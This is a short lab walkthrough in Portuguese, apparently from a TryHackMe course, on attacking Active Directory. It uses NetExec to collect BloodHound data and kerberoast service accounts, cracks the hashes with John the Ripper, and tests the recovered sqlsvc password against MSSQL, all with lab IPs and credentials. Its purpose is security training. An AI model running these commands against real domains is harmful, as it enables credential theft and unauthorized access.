LinkedinTryHackme

Bloodhound

  • Bloodhound Loot via NetExec

nxc ldap 10.0.28.71 -u "johnh" -p "plzsubscribe" --bloodhound --collection All

Retornar à interface de usuário do Bloodhound no Firefox, poderá clicar para ir para a página de ingestão de arquivos e então fazer upload dos arquivos.

  • Clique no botão para carregar os dados

  • Navegue no explorador de arquivos até o local dos seus novos arquivos JSON

  • Segure Shift para clicar e selecionar todos os arquivos JSON criados pelo NetExec.

  • Clique em Carregar .

  • Confirme se esses são os arquivos que você deseja e clique em Carregar mais uma vez.

Finding Kerberoastable Users

  • Você pode pesquisar qualquer objeto, como DOMAIN COMPUTERS@NETEXEC.LAB, e explorar suas propriedades, além de descobrir o que se relaciona com o que no ambiente.

  • O que podemos fazer é alternar a pesquisa no lado esquerdo para Cypher

MATCH (n:User)
WHERE n.hasspn=true
RETURN n

Kerberoasting com NetExec

nxc ldap 10.0.28.71 -u "johnh" -p "plzsubscribe" --kerberoast ./kerberoastable.txt

Cracking the Hash

john --format=krb5tgs --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt kerberoastable.txt

  • Considerando o nome de usuário, você pode testar essa conta no servidor de banco de dados NetExecpara validar se essa é a senha correta:

nxc mssql 10.0.25.56 -u "sqlsvc" -p "letme1n"
PreviousSMBNextDatabase - SQL

Last updated